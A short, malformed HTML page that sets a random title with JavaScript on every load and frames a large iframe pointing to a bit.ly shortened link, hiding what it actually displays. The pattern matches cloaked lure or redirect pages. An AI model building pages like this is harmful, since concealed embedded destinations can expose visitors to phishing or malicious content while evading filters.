<html lang=en>
  <head>
    <title>aJDnvwiNDjal</title>
    
    <script>
         var result           = '';
         var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
         var charactersLength = characters.length;
         for ( var i = 0; i < 10; i++ ) {
            result += characters.charAt(Math.floor(Math.random() * charactersLength));
         }
         document.title = result;
    </script>
    <body>
      </hr>
    <iframe src="https://bit.ly/3nMKZkc" width="800px" height="800px"></iframe>
    </body>
  </head>
</html>
